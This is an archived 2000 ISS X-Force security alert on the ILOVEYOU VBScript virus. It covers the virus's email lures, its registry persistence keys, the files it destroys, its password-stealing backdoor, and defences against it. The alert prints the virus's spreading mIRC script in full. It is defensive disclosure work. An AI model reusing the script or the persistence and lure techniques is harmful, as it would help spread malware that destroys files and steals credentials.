From xforce@iss.net Sun May 14 13:42:20 2000 From: X-Force Resent-From: mea culpa To: alert@iss.net Resent-To: jericho@attrition.org Date: Fri, 5 May 100 18:16:49 -0400 (EDT) Subject: ISSalert: Internet Security Systems Security Alert TO UNSUBSCRIBE: email "unsubscribe alert" in the body of your message to majordomo@iss.net Contact alert-owner@iss.net for help with any problems! --------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Internet Security Systems Security Alert May 5, 2000 -- *UPDATED* "ILOVEYOU" Virus Affects Windows Users Synopsis: A dangerous Visual Basic Script (VBScript) virus, dubbed the "ILOVEYOU" or "LoveLetter" virus, has been spreading itself across the Internet through email using Microsoft Outlook and Internet Relay Chat (IRC) via mIRC, a popular chat client for Windows. The virus is susceptible to activation whenever the Windows Scripting Host (WSH) features are enabled. Impact: Mail servers may incur mild to severe overloading and could crash when flooded with an unexpected number of the ILOVEYOU messages. The actual VBScript code performs a number of destructive tasks: - Modifies and creates various Windows registry entries. - Launches Internet Explorer to download a backdoor program which, once installed, captures network passwords and emails this data to an account in the Philippines. - Infects the local machine by creating many new copies of itself and overwriting data files of specific file types (including VBScript, JPEG, and JavaScript). - Spreads itself to other users by using information from the Microsoft Outlook Address Book, as well as mIRC's DCC feature, which allows chat participants to exchange files Description: Visual Basic Scripts can be executed if Windows Scripting Host (WSH) is installed and enabled. Windows Scripting Host is installed by default with Windows 98 and with Internet Explorer version 4.0 and later. The original version of the virus was spread as follows: Subject: ILOVEYOU Body: kindly check the attached LOVELETTER coming from me. Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs Internet Security Systems has become aware of several other variants of this virus as shown below. Please note that modifying the virus is trivial and that new versions may be distributed at any time. Subject: fwd: Joke Attachment: Very Funny.vbs Subject: Susitikim shi vakara kavos puodukui... Body: kindly check the attached LOVELETTER coming from me. Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs Subject: Mothers Day Order Confirmation Body: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place. Thanks Again and Have a Happy Mothers Day! mothersday@subdimension.com Attachment: mothersday.vbs When the attachment is opened, the malicious VBScript code launches, performing the following operations in sequence: - The virus removes the timeout associated with the Windows scripting unit by changing the value of the "HKEY_CURRENT_USER\Software\Microsoft\ Windows Scripting Host\Settings\Timeout" registry key. - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs. - The following registry entries are created under HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 \Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL Win32DLL.vbs is created as a service. - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM. - The virus attempts to spread itself via e-mail using Microsoft Outlook. It sends a message to all addresses found in every address book. Each individual is flagged in the registry after they have been sent a copy. For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB. - The virus uses Internet Explorer to connect one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, presumably controlled by the author of the virus. The original download locations for the WIN-BUGSFIX.EXE file seem to be invalid. Be aware that modified versions of the virus may point to valid copies of the backdoor, so this is still a threat. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random: \Software\Microsoft\Internet Explorer\Main\Start Page After the executable is downloaded, the start page value is set to "about:blank". The Mother's Day variation of the virus does not attempt to install the backdoor, but does modify the Internet Explorer start page. - The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE - The virus identifies any local or network drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file: vbs - Visual Basic Script vbe - Visual Basic Script (Encoded) js - JavaScript jse - JavaScript (Encoded) css - Cascading Style Sheets wsh - Windows Scripting Host sct - Scriptlet file hta - HTML Application The virus deletes any ".jpg" and ".jpeg" compressed image files, and replaces a copy of the virus with ".vbs" appended to the end of the original file name. The Mother's Day variation of the virus removes files of type ".ini" (Windows script files) and ".bat" (DOS batch files) instead of ".jpg" and ".jpeg". Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden. - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory: [script] ;mIRC Script ; Please dont edit this script... mIRC will corrupt, if mIRC will ; corrupt... WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ;http://www.mirc.com ; n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" n3=} This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC. Recommendations: Everyone should obtain and install the latest virus definition files for their virus scanning software. Mail administrators should filter out any email that has a .VBS attachment, or at least any mail with a subject line of "ILOVEYOU". ISS' SAFEsuite intrusion detection and response system, RealSecure, can be configured to detect the ILOVEYOU virus by creating a new User Defined Event. Set the priority to HIGH, and the context to Email_Content. Set the search string to "kindly check the attached LOVELETTER coming from me". Select the actions to RSKILL, and any additional action you would like. This should stop any incoming email containing the virus from being delivered to an SMTP server. RS can also be modified to detect and kill the ILU virus destined to a POP server. In addition to the steps above, the policy file template must be modified using a text editor. In the SMTP field of the \template\protocol section add the POP ports to SMTP definitions. This section is shown below: [\template\protocols\]; http =S 80; ftp =S 21; smtp =S 25, 109-110; pop =S 109-110; imap =S 143 220; nntp =S 119; [\template\userdefinedsignatures\]; Repeat for each variant of the virus as described above. Windows Scripting Host can be disabled in Windows 98 as follows: From the Control Panel, double-click "Add/Remove Programs". Click the "Windows Setup" tab and double-click on "Accessories". Scroll down if necessary and uncheck the box beside "Windows Scripting Host". Click "OK" and the Accessories dialog box will disappear. Now click the "Apply" button from the Add/Remove Programs Properties. Windows will now uninstall Windows Scripting Host from the system. The WIN-BUGSFIX.EXE program attempts to connect to port 25 of IP address 199.108.232.1 to deliver the captured passwords. The message that is sent is as follows: To: mailme@super.net.ph Subject: Barok... email.passwords.sender.trojan X-Mailer: Barok... email.passwords.sender.trojan---by: spyder Host: kakker Username: Default IP Address: 10.67.101.123 RAS Passwords: Cache Passwords: BLABLA\MPM : xxx BJORN\MUSIC : xxx TOM\SHARED : xxx TOM2\MP3 : xxx www.server.com/ : xxx:xxx MAPI : MAPI The "xxx" represent the plaintext usernames and passwords captured by the WIN-BUGSFIX.EXE program. Trend Micro's instructions for removing the virus from your system can be found at http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER Additional Information: For more information on the ILOVEYOU virus, visit the following web sites: http://europe.datafellows.com/v-descs/love.htm http://vil.mcafee.com/dispVirus.asp?virus_k=98617 http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-05-01&msg=20000504121550.B20905@securityfocus.com http://www.sarc.com/avcenter/venc/data/vbs.loveletter.a.html _______ About Internet Security Systems (ISS) Internet Security Systems (ISS) is a leading global provider of security management solutions for the Internet. By providing industry-leading SAFEsuite security software, remote managed security services, and strategic consulting and education offerings, ISS is a trusted security provider to its customers, protecting digital assets and ensuring safe and uninterrupted e-business. ISS' security management solutions protect more than 5,500 customers worldwide including 21 of the 25 largest U.S. commercial banks, 10 of the largest telecommunications companies and over 35 government agencies. Founded in 1994, ISS is headquartered in Atlanta, GA, with additional offices throughout North America and international operations in Asia, Australia, Europe, Latin America and the Middle East. For more information, visit the Internet Security Systems web site at www.iss.net or call 888-901-7477. Copyright (c) 2000 by Internet Security Systems, Inc. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://xforce.iss.net/sensitive.php as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBORMoMTRfJiV99eG9AQH4uQP9FJlj+quxhqRM8NdV5TX7OFlOjoxs+yA3 EvtueaGc7dnI08EUgiUCUERjpYCtI8CnL2Gw4kETkmk6wWeHEaig4c1QkBMtjoOs dB4iDKv+NjutECNH3SS71n7D6wkJlNUSk/rJ+WHyHhlwmDH2B09qNn6wRYUbjFtJ TLzqCqcKos0= =kZmQ -----END PGP SIGNATURE-----